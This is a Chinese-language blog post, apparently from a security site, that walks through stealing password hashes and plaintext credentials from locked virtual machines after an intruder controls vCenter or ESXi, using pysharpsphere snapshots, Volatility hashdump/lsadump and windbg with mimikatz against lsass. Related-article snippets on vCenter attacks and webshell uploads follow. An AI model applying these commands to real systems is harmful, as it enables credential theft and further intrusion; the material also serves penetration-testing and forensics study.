<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    VCenter獲得鎖屏機器Hash之內存快照抓取Hash

    VSole2022-07-11 07:58:22

    VCenter獲得鎖屏機器Hash之內存快照抓取Hash

    內存快照抓hash

        在很多情況下,當我們拿到VCenter或ESXI 服務器權限和Web后臺權限登錄后,發現很多重要的系統鎖屏了,想要進入還需要輸入密 碼。因此,這時我們就需要抓取處于鎖屏狀態機器的Hash了。以下介紹使用內存快照抓取Hash。

        使用pysharpsphere或SharpSphere對指定目標機器拍攝快照,然后dump鏡像到本地。

    #dump MoID為vm-59的機器鏡像到本地

    pysharpsphere -H 192.168.106.14 -u administrator@vsphere.local -p "P@ssword1234" dump -t vm-59
    

    Volatility讀取內存

    目標機器快照鏡像dump到本地后,可以使用Volatility直接對.vmem文件進行內存密碼抓取。

    如下命令獲取鏡像信息:

    ./volatility_2.6_mac64_standalone -f Win7-Snapshot2.vmem imageinfo

    如下命令抓取哈希或明文密碼:

    #抓取哈希

    ./volatility_2.6_mac64_standalone -f Win7-Snapshot2.vmem --profile=Win7SP1x64 hashdump
    

    #抓取明文密碼

    ./volatility_2.6_mac64_standalone -f Win7-Snapshot2.vmem --profile=Win7SP1x64 lsadump
    

    windbg讀取內存

    也可以使用windbg進行讀取。首先使用 Bin2Dmp執行如下命令將該內存文件轉成dmp文件,如下轉成win7.dmp文件。

    Bin2Dmp.exe Win7-Snapshot2.vmem win7.dmp
    

    然后使用windbg載入win7.dmp文件,如下。

    接著在kd> 中輸入下面的命令

    #設置符號路徑

    .symfix  

    #重新載入

    .reload   

    #加載mimilib.dll路徑

    .load D:\mimikatz\x64\mimilib.dll  

    #查找lsass進程,并將該進程轉到本機環境中

    !process 0 0 lsass.exe

    #這里的fffffa80035c4b30是上一步查找lsass進程的地址,注意替換

    .process /r /p fffffa80035c4b30  

    #載入mimikatz,讀取密碼

    !mimikatz

    最后讀取出密碼如下。

    hashvcenter
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    筆者在對volatility工具進行了解后,對分析vmem文件的手法進行了一定優化,可以提升解決鎖屏問題的效率。不過官方團隊并沒有打包volatility3的可執行程序,原因寫的是打包出來的packages會被識別為惡意軟件,解決了這個問題就會出可執行程序了。過程思路一、直接在esxi中部署volatility3項目Linux環境下的esxi,這個思考很快就被證明不太可行了,volatility3需要多個系統庫和pip庫:yum install zlib &&\yum install zlib-devel &&\yum install bzip2-devel &&\yum install ncurses-devel &&\yum install sqlite-devel &&\yum install readline-devel &&\yum install gcc &&\yum install libffi &&\yum install libffi-devel &&\yum install gcc-c++\yum install openssl-devel\yum install tk-devel
    在很多情況下,當我們拿到VCenter或ESXI 服務器權限和Web后臺權限登錄后,發現很多重要的系統鎖屏了,想要進入還需要輸入密 碼。因此,這時我們就需要抓取處于鎖屏狀態機器的Hash了。
    在很多情況下,當我們拿到VCenter或ESXI 服務器權限和Web后臺權限登錄后,發現很多重要的系統鎖屏了,想要進入還需要輸入密 碼。因此,這時我們就需要抓取處于鎖屏狀態機器的Hash了。
    VCenter獲得鎖屏機器Hash之KonBoot引導KonBoot引導免密登錄????以下介紹使用KonBoot引導免密進入。????因為該方法需要重啟機器,因此先對目標主機進行克隆,此后的所有操作對克隆主機進行操作。
    VMware vCenter漏洞實戰利用總結
    Vcenter一般指VMware vCenter Server,其提供了一個可伸縮、可擴展的平臺,為虛擬化管理奠定了基礎,可集中管理VMware vSphere環境,與其他管理平臺相比,極大地提高了IT管理員對虛擬環境的控制,Vcenter可以使管理員從一個位置深入了解虛擬基礎架構的集群、主機、虛擬機、存儲、客戶操作系統和其他關鍵組件等所有信息。
    vCenter Server 常用攻擊手法
    在內網滲透中常常會碰到VmwareVcenter,對實戰打法以及碰到的坑點做了一些總結,部分內容參考了師傅們提供的寶貴經驗,衷心感謝各位師傅!
    VMware Inc. 是一家軟件公司。它開發了許多產品,尤其是各種云解決方案 。他的云解決方案包括云產品,數據中心產品和桌面產品等。
    目標分配后,面對大范圍的目標,首先要做的就是尋找一些容易獲取權限的站點,比如shiro、weblogic以及各類反序列化漏洞。之后再將目標鎖定到管理后臺,使用爆破等手段尋找一些能進后臺的賬號密碼,然后再去找上傳點拿shell。 本次滲透在某站注冊頁面發現了上傳身份證的地方,但是上傳后發現無返回路徑。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类